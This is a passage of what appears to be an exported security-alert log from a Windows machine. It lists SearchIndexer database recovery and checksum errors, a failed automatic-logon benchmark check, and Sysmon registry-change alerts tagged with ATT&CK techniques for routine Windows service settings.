+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:34.284",3,"The database engine attached a database",,"""SearchIndexer (4560,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00D9:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000004 +J(0) +[2] 0.000235 +J(0) +M(C:0K, Fs:24, WS:32K # 0K, PF:32K # 0K, P:32K) +[3] 0.008573 -0.004717 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:13, WS:-752K # 0K, PF:-752K # 0K, P:-752K) +[4] 0.000111 +J(0) +[5] - +[6] - +[7] - +[8] 0.002692 -0.001402 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:27, WS:108K # 0K, PF:536K # 0K, P:536K) +[9] 0.018973 -0.000618 (5) CM -0.018161 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:60, WS:240K # 0K, PF:224K # 0K, P:224K) +[10] 0.000243 -0.000150 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:9, WS:36K # 0K, PF:32K # 0K, P:32K) +[11] 0.000012 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[12] 0.000032 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 0K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 26, 2020 @ 10:45:34.173",3,"The database engine has completed recovery steps",,"""SearchIndexer (4560,U,98) Windows: The database engine has successfully completed recovery steps.""" +"Apr 26, 2020 @ 10:45:34.162",3,"The database engine is replaying log file C:\Winnt\system32\wins\j50.log",,"""SearchIndexer (4560,R,98) Windows: The database engine has finished replaying logfile C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jtx. 
+ +Processing Stats: +[1] 0.090206 -0.030585 (44) CM -0.016607 (5) WT +J(CM:44, PgRf:547, Rd:0/44, Dy:44/1136, Lg:863189/6127) +M(C:0K, Fs:795, WS:2296K # 2200K, PF:2120K # 2020K, P:2120K). +Log record of type 'Commit ' was seen most frequently (1417 times)""" +"Apr 26, 2020 @ 10:45:34.147",9,"Windows Application error event",,"""SearchIndexer (4560,R,98) Windows: The database page read from the file ""C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb"" at offset 17727488 (0x00000000010e8000) (database page 540 (0x21C)) for 32768 (0x00008000) bytes failed verification due to a page checksum mismatch. The stored checksum was [f0820de831010000:0dba80110841f1dd:008071cf8605f3af:7110780f812053b0] and the computed checksum was [0000021c6e69fd07:0000000000000000:0000000000000000:0000000000000000]. The read operation will fail with error -1018 (0xfffffc06). If this condition persists then please restore the database from a previous backup. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.""" +"Apr 26, 2020 @ 10:45:34.118",9,"Windows Application error event",,"""SearchIndexer (4560,R,98) Windows: The database page read from the file ""C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb"" at offset 17694720 (0x00000000010e0000) (database page 539 (0x21B)) for 32768 (0x00008000) bytes failed verification due to a page checksum mismatch. The stored checksum was [0942d802f4820de4:091ad81231011400:310d140071a9f4af:7a60bdc1d8058640] and the computed checksum was [0000021b72421132:0000000000000000:0000000000000000:0000000000000000]. The read operation will fail with error -1018 (0xfffffc06). If this condition persists then please restore the database from a previous backup. This problem is likely due to faulty hardware. 
Please contact your hardware vendor for further assistance diagnosing the problem.""" +"Apr 26, 2020 @ 10:45:34.098",9,"Windows Application error event",,"""SearchIndexer (4560,R,98) Windows: The database page read from the file ""C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb"" at offset 17661952 (0x00000000010d8000) (database page 538 (0x21A)) for 32768 (0x00008000) bytes failed verification due to a page checksum mismatch. The stored checksum was [1f981d4df0060f10:1081152c90981e4a:3dbc008077cfd800:1e910040200fdcc4] and the computed checksum was [0000021ae0df7aba:0000000000000000:0000000000000000:0000000000000000]. The read operation will fail with error -1018 (0xfffffc06). If this condition persists then please restore the database from a previous backup. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.""" +"Apr 26, 2020 @ 10:45:34.076",9,"Windows Application error event",,"""SearchIndexer (4560,R,98) Windows: The database page read from the file ""C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb"" at offset 18186240 (0x0000000001158000) (database page 554 (0x22A)) for 32768 (0x00008000) bytes failed verification due to a page checksum mismatch. The stored checksum was [1d18d80a06600baa:d83206600b8200c6:d80079608520f049:00a075cff437e083] and the computed checksum was [0000022aab7f8830:0000000000000000:0000000000000000:0000000000000000]. The read operation will fail with error -1018 (0xfffffc06). If this condition persists then please restore the database from a previous backup. This problem is likely due to faulty hardware. 
Please contact your hardware vendor for further assistance diagnosing the problem.""" +"Apr 26, 2020 @ 10:45:34.051",9,"Windows Application error event",,"""SearchIndexer (4560,R,98) Windows: The database page read from the file ""C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb"" at offset 18153472 (0x0000000001150000) (database page 553 (0x229)) for 32768 (0x00008000) bytes failed verification due to a page checksum mismatch. The stored checksum was [bdc588497945ba10:1e94900a90401e58:80009f981e939018:7088fe4f0eda0000] and the computed checksum was [00000229a7da97d6:0000000000000000:0000000000000000:0000000000000000]. The read operation will fail with error -1018 (0xfffffc06). If this condition persists then please restore the database from a previous backup. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.""" +"Apr 26, 2020 @ 10:45:33.990",3,"The database engine is initiating recovery steps",,"""SearchIndexer (4560,R,98) Windows: The database engine is initiating recovery steps.""" +"Apr 26, 2020 @ 10:45:33.978",3,"The database engine is starting a new instance",,"""SearchIndexer (4560,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 26, 2020 @ 10:45:31.435",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 26, 2020 @ 10:45:29.089",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.179037600Z"",""eventRecordID"":""605"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:22.277\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:22.277"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:22.277 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.912",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.150338500Z"",""eventRecordID"":""599"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.877",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.149957200Z"",""eventRecordID"":""598"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_37a6f\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_37a6f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_37a6f\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:45:28.835",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.148982800Z"",""eventRecordID"":""597"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.787",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.148745600Z"",""eventRecordID"":""596"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.707",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.147929900Z"",""eventRecordID"":""595"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_37a6f\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.653",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.147688800Z"",""eventRecordID"":""594"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.636",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.105949800Z"",""eventRecordID"":""593"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 26, 2020 @ 10:45:28.624",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.105745800Z"",""eventRecordID"":""592"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.597",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.104965400Z"",""eventRecordID"":""591"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.575",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.104751100Z"",""eventRecordID"":""590"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.554",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.103966200Z"",""eventRecordID"":""589"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.506",9,"ATT&CK T1058:Registry edit for new 
